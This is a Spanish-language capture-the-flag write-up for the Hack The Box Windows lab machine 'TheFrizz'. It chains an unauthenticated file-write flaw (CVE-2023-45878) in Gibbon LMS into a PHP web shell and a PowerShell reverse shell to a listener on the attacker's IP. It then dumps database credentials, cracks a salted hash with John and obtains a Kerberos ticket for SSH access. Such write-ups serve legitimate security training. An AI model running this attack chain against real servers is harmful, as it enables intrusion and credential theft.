Thefrizz

Publicado: 30 de Junio de 2025 Autor: José Miguel Romero aKa x3m1Sec Dificultad: ⭐ Medium OS: Windows

📝 Descripción

TheFrizz es una máquina Windows de dificultad media que simula un entorno de Active Directory con un servicio web que ejecuta Gibbon LMS. La explotación inicial se basa en aprovechar una vulnerabilidad de escritura arbitraria de archivos sin autenticación (CVE-2023-45878) en Gibbon LMS v25.0.1, que permite subir una web shell PHP y obtener RCE (Remote Code Execution).

Una vez dentro del sistema, se realizan tareas de post-explotación para descubrir credenciales de base de datos almacenadas en archivos de configuración. A través de la enumeración de la base de datos MySQL, se obtienen hashes de contraseñas que se crackearon exitosamente, permitiendo el acceso SSH al dominio y la escalada de privilegios mediante técnicas de autenticación Kerberos.

Esta máquina pone a prueba habilidades en:

Explotación de vulnerabilidades web (CVE-2023-45878)
Enumeración de Active Directory
Cracking de hashes con técnicas de salt
Autenticación Kerberos y manejo de tickets
Post-explotación en entornos Windows

📊 Resumen de la Explotación

🔗 Cadena de Ataque

graph TB
    A[🔍 Reconocimiento] --> B[🚀 Escaneo de Puertos]
    B --> C[🌐 Descubrimiento de Gibbon LMS]
    C --> D[🎯 CVE-2023-45878 - RCE]
    D --> E[📂 Acceso como w.webservice]
    E --> F[🔐 Extracción de credenciales DB]
    F --> G[🗃️ Enumeración de MySQL]
    G --> H[💥 Cracking de hashes]
    H --> I[🎫 Obtención de TGT Kerberos]
    I --> J[🏆 Acceso SSH como f.frizzle]

🎯 Puntos Clave

🔥 Vulnerabilidades Críticas:

CVE-2023-45878: Escritura arbitraria de archivos sin autenticación en Gibbon LMS
Credenciales hardcodeadas en archivos de configuración
Hashes débiles con salt predecible

🛡️ Técnicas de Explotación:

File Upload Bypass para RCE
Database Enumeration post-compromiso
Hash Cracking con salt customizado
Kerberos Authentication con TGT

🎯 Servicios Objetivo:

Gibbon LMS (Puerto 80) - Punto de entrada
MySQL (Local) - Escalada de privilegios
SSH (Puerto 22) - Acceso final
Kerberos (Puerto 88) - Autenticación de dominio

🔭 Reconocimiento

🏓 Ping para verificación en base a TTL

❯ ping -c2 10.10.11.60     
PING 10.10.11.60 (10.10.11.60) 56(84) bytes of data.
64 bytes from 10.10.11.60: icmp_seq=1 ttl=127 time=42.5 ms
64 bytes from 10.10.11.60: icmp_seq=2 ttl=127 time=44.1 ms

--- 10.10.11.60 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1005ms
rtt min/avg/max/mdev = 42.527/43.308/44.089/0.781 ms

💡 Nota: El TTL cercano a 128 sugiere que probablemente sea una máquina Windows.

🚀 Escaneo de puertos

ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.60 | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//)

echo $ports                                                                        
22,53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49664,49668,49670,59524,59528,59537

🔍 Enumeración de servicios

nmap -sC -sV -p$ports 10.10.11.60 -oN services.txt                         
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-30 17:50 CEST
Nmap scan report for 10.10.11.60
Host is up (0.042s latency).

PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-30 22:50:47Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
59524/tcp open  msrpc         Microsoft Windows RPC
59528/tcp open  msrpc         Microsoft Windows RPC
59537/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-30T22:51:40
|_  start_date: N/A

⚠️ Añadimos el siguiente vhost a nuestro fichero /etc/hosts:

echo "10.10.11.60 frizz.htb frizzdc.frizz.htb" | sudo tee -a /etc/hosts

📋 Análisis de Servicios Detectados

Puerto

Servicio

Descripción

SSH

OpenSSH for Windows - Acceso remoto

DNS

Servicio DNS del dominio

HTTP

Servidor web Apache con PHP

Kerberos

Autenticación del dominio

135

MSRPC

Llamadas a procedimientos remotos

139/445

SMB/NetBIOS

Recursos compartidos

389/636

LDAP/LDAPS

Directorio activo

🔥 Servicios críticos identificados:

Dominio Active Directory: frizz.htb
Controlador de dominio: FRIZZDC
Desfase horario: 6h59m59s (crítico para Kerberos)
Firma SMB: Requerida (entorno seguro)

🌐 Enumeración de Servicios

🗂️ SMB (Puerto 445) - Acceso Inicial

Ya que no disponemos de credenciales, comenzamos tratando de enumerar sin éxito posibles recursos mediante una sesión nula:

🔒 Enumeración de recursos compartidos

smbclient -N -L 10.10.11.60                        
session setup failed: NT_STATUS_NOT_SUPPORTED

netexec smb 10.10.11.60 -u anonymous -p ''                                    
SMB         10.10.11.60     445    10.10.11.60      [*]  x64 (name:10.10.11.60) (domain:10.10.11.60) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.60     445    10.10.11.60      [-] 10.10.11.60\anonymous: STATUS_NOT_SUPPORTED

❌ Resultado: No se permite acceso anónimo a recursos SMB

🌐 HTTP (Puerto 80) - Servicio Web Principal

🏠 Página Principal (http://frizzdc.frizz.htb)

🎓 Gibbon LMS Discovery

Al pulsar en la opción Staff Login somos redireccionados al siguiente servicio implementado con Gibbon LMS:

URL: http://frizzdc.frizz.htb/Gibbon-LMS/

🔍 Fingerprinting del Servicio

whatweb -a 3 frizzdc.frizz.htb/Gibbon-LMS/ 

http://frizzdc.frizz.htb/Gibbon-LMS/ [200 OK] Apache[2.4.58], Cookies[G60fa1cd0af7be78b], Country[RESERVED][ZZ], HTML5, HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12], HttpOnly[G60fa1cd0af7be78b], IP[10.10.11.60], JQuery, Meta-Author[Ross Parker, International College Hong Kong], OpenSSL[3.1.3], PHP[8.2.12], PasswordField[password], Script[text/javascript], Title[WES - Gibbon], X-Frame-Options[SAMEORIGIN]

📚 Información sobre Gibbon LMS

Gibbon es una plataforma de gestión escolar flexible y de código abierto diseñada para mejorar la vida de profesores, estudiantes, padres y líderes.

Versión identificada: v25.0.00

🚨 Investigación de Vulnerabilidades

La versión instalada (v25.0.00) es vulnerable a múltiples CVEs para versiones anteriores a la v26.0:

🎯 CVE-2023-45878 - Escritura Arbitraria de Archivos

Descripción: GibbonEdu Gibbon versión 25.0.1 y anteriores permite la escritura arbitraria de archivos porque rubrics_visualise_saveAjax.php no requiere autenticación.

Parámetros vulnerables:

img: Imagen codificada en base64
path: Ruta de destino
gibbonPersonID: ID de persona

Impacto: Permite la creación de archivos PHP que posibilitan la ejecución remota de código no autenticado.

🎯 Explotación - CVE-2023-45878

🔧 Herramienta de Explotación

Existe un exploit público que facilita la explotación de esta vulnerabilidad:

Repositorio: https://github.com/davidzzo23/CVE-2023-45878

git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878

🧪 Verificación de RCE

Confirmamos la ejecución remota de comandos a través del exploit:

python3 CVE-2023-45878.py -t 10.10.11.60 -c whoami 

[+] Uploading web shell as jgmlfjwg.php...
[+] Upload successful.
[+] Executing command on: http://10.10.11.60/Gibbon-LMS/jgmlfjwg.php?cmd=whoami
[+] Command output:
frizz\w.webservice

✅ Resultado: Ejecución exitosa como usuario frizz\w.webservice

🐚 Obtención de Reverse Shell

El exploit incluye funcionalidad para obtener una reverse shell de PowerShell:

python3 CVE-2023-45878.py -t 10.10.11.60 -s -i 10.10.14.9 -p 443

[+] Uploading web shell as yoixxtpt.php...
[+] Upload successful.
[+] Sending PowerShell reverse shell payload to http://10.10.11.60/Gibbon-LMS/yoixxtpt.php
[*] Make sure your listener is running: nc -lvnp 443

📞 Listener y Conexión

rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.60] 57245
whoami
frizz\w.webservice
PS C:\xampp\htdocs\Gibbon-LMS> pwd

Path                      
----                      
C:\xampp\htdocs\Gibbon-LMS

🎉 Acceso inicial obtenido como frizz\w.webservice

🔍 Post-Explotación y Escalada de Privilegios

📂 Enumeración del Sistema

Una vez en la máquina, observamos que el directorio Users está vacío. Centramos la enumeración en el directorio xampp.

🔐 Descubrimiento de Credenciales

Ubicamos un archivo de configuración crítico en: Ruta: C:\xampp\htdocs\Gibbon-LMS\config.php

Credenciales encontradas:

$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

🗃️ Enumeración de Base de Datos

Utilizamos el binario mysql.exe de la instalación de XAMPP:

📊 Exploración de bases de datos

.\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "SHOW DATABASES;" -E

📋 Enumeración de tablas

.\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "USE gibbon; SHOW TABLES;" -E

👥 Extracción de usuarios

.\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "USE gibbon; SELECT * FROM gibbonperson;" -E

💥 Cracking de Hashes

Hash objetivo identificado:

Usuario: f.frizzle
Hash: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
Salt: /aACFhikmNopqrRTVz2489

🔨 Preparación para John The Ripper

Creamos un archivo con el formato correcto:

f.frizzle:$dynamic_82$067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489

🎯 Ataque de diccionario

john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt frizle-hash.txt

🔓 Credencial descifrada: f.frizzle:Jenni_Luvs_Magic23

🎫 Autenticación Kerberos

⏰ Sincronización de Tiempo

sudo ntpdate frizzdc.frizz.htb

🎟️ Obtención de TGT

impacket-getTGT frizz.htb/'f.frizzle':'Jenni_Luvs_Magic23' -dc-ip frizzdc.frizz.htb

🔧 Configuración del Ticket

export KRB5CCNAME=f.frizzle.ccache

🚪 Acceso SSH Final

ssh f.frizzle@frizz.htb -K

🏆 Acceso exitoso al sistema como f.frizzle

PreviousCertified NextEscape

Last updated 7 months ago

hashtag📝 Descripción

hashtag📊 Resumen de la Explotación

hashtag🔗 Cadena de Ataque

hashtag🎯 Puntos Clave

hashtag🔭 Reconocimiento

hashtag🏓 Ping para verificación en base a TTL

hashtag🚀 Escaneo de puertos

hashtag🔍 Enumeración de servicios

hashtag📋 Análisis de Servicios Detectados

hashtag🌐 Enumeración de Servicios

hashtag🗂️ SMB (Puerto 445) - Acceso Inicial

hashtag🌐 HTTP (Puerto 80) - Servicio Web Principal

hashtag🎯 Explotación - CVE-2023-45878

hashtag🔧 Herramienta de Explotación

hashtag🧪 Verificación de RCE

hashtag🐚 Obtención de Reverse Shell

hashtag📞 Listener y Conexión

hashtag🔍 Post-Explotación y Escalada de Privilegios

hashtag📂 Enumeración del Sistema

hashtag🔐 Descubrimiento de Credenciales

hashtag🗃️ Enumeración de Base de Datos

hashtag💥 Cracking de Hashes

hashtag🎫 Autenticación Kerberos

hashtag⏰ Sincronización de Tiempo

hashtag🎟️ Obtención de TGT

hashtag🔧 Configuración del Ticket

hashtag🚪 Acceso SSH Final